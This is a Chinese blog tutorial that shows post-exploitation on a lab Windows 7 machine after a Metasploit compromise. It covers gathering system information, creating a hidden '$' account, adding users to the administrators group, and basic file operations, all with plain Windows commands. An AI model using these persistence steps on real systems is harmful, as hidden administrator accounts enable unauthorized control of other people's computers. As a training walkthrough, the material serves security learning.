当前位置:网站首页>网络安全工程师演示:原来***是这样获取你的计算机管理员权限的!【维持】
网络安全工程师演示:原来***是这样获取你的计算机管理员权限的!【维持】
2020-11-06 01:35:00 【Kali与编程】
课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络***干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
正文部分
一、背景介绍
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用***控制受害者主机呢?接下来让我们一起学习!
二、资源装备
1.成功拿下的 Win7虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
三、战略安排
3.1 对拿下的Windows主机进入后***阶段,具体操作如下图所示。
步骤1:运行漏洞利用模块,如下图所示。
命令:run
步骤2:进入Windows主机的cmd窗口,如下图所示。
步骤3:利用命令查看受害者主机的系统信息,知己知彼对目标受害者主机进行更全面的掌握,更全面的控制目标主机,获取更全面的信息,如下图所示。
命令:systeminfo
步骤4:受害者主机的系统信息如下图所示。
3.2 对受害者主机进行用户管理操作,如下图所示。
步骤1:给受害者主机添加可以隐藏的用户信息,如下图所示。
命令:net user 新用户名$ 用户密码 /add
例子:net user admin$ 12456 /add
步骤2:查看刚才添加的新用户,如下图所示。
命令:net user(因为新建的用户为隐藏用户,所以命令行查看不到该用户)
步骤3:添加不隐藏的新用户,如下图所示。
命令:net user 新用户名 用户密码 /add
例子:net user admin 12456 /add
步骤4:查看刚才添加的新用户,如下图所示。
命令:net user
步骤5:在受害者主机中利用图形化界面查看刚才新建的用户,可见在该界面是可以看见新建的隐藏用户的(如果需要实现真正意义上的隐藏用户的话需要更改注册表,请持续关注本号后续讲解)
步骤6:删除用户,如下图所示。
命令:net user 用户名 /del
例子:net user admin /del
步骤7:将新建的用户添加到管理员组,如下图所示。
命令:net localgroup administrators /add
步骤8:查看管理员组的用户,如下图所示。
命令:net localgroup administrators
3.3 对受害者主机进行文件操作,如下图所示。
步骤1:新建文件夹
命令:md 文件名
例子:md abc
步骤2:删除文件夹
命令:rd 文件名
例子:rd abc
步骤3:新建文本文件,如下图所示。
命令:echo 文本文件内容 > 文件名
例子:echo hi you are hacked > hk.txt
3.4 对受害者主机进行查看主机名操作,如下图所示。
命令:hostname
小编一个个字敲打创作,可辛苦了,问君可否关注一下我呢?你还可搜索:Kali与编程,学习更多******技巧呢 !拒绝盗版,转载请声明来源:Kali与编程
点我学习更多Kali Linux***测试与网络***实战技巧!请添加链接描述
版权声明
本文为[Kali与编程]所创,转载请带上原文链接,感谢
https://blog.51cto.com/14308022/2547210
边栏推荐
- 接口压力测试:Siege压测安装、使用和说明
- 自然语言处理-错字识别(基于Python)kenlm、pycorrector
- 7.2.2 compressing static resources through gzipresourceresolver
- 让前端攻城师独立于后端进行开发: Mock.js
- 别走!这里有个笔记:图文讲解 AQS ,一起看看 AQS 的源码……(图文较长)
- Using tensorflow to forecast the rental price of airbnb in New York City
- 面经手册 · 第12篇《面试官,ThreadLocal 你要这么问,我就挂了!》
- PPT画成这样,述职答辩还能过吗?
- 6.8 multipartresolver file upload parser (in-depth analysis of SSM and project practice)
- 企业数据库的选择通常由系统架构师主导决策 - thenewstack
猜你喜欢

如何对Pandas DataFrame进行自定义排序

Using tensorflow to forecast the rental price of airbnb in New York City

python jieba分词(结巴分词)、提取词,加载词,修改词频,定义词库

面经手册 · 第14篇《volatile 怎么实现的内存可见?没有 volatile 一定不可见吗?》

为了省钱,我用1天时间把PHP学了!

技術總監7年經驗,告訴大家,【拒絕】才是專業

写一个通用的幂等组件,我觉得很有必要

JVM内存区域与垃圾回收

字符串的常见算法总结

面经手册 · 第15篇《码农会锁,synchronized 解毒,剖析源码深度分析!》
随机推荐
微服務 - 如何解決鏈路追蹤問題
c++学习之路:从入门到精通
mac 安装hanlp,以及win下安装与使用
让前端攻城师独立于后端进行开发: Mock.js
简直骚操作,ThreadLocal还能当缓存用
Using lime to explain black box ML model
7.2.1 cache configuration of static resources
自然语言处理-错字识别(基于Python)kenlm、pycorrector
写一个通用的幂等组件,我觉得很有必要
APReLU:跨界应用,用于机器故障检测的自适应ReLU | IEEE TIE 2020
计算机TCP/IP面试10连问,你能顶住几道?
普通算法面试已经Out啦!机器学习算法面试出炉 - kdnuggets
Cocos Creator 原始碼解讀:引擎啟動與主迴圈
Skywalking系列博客1-安装单机版 Skywalking
Python machine learning algorithm: linear regression
drf JWT認證模組與自定製
看完这篇就看懂了很多webpack脚手架
Python爬蟲實戰詳解:爬取圖片之家
被老程式設計師壓榨怎麼辦?我不想辭職
【jmeter】實現介面關聯的兩種方式:正則表示式提取器和json提取器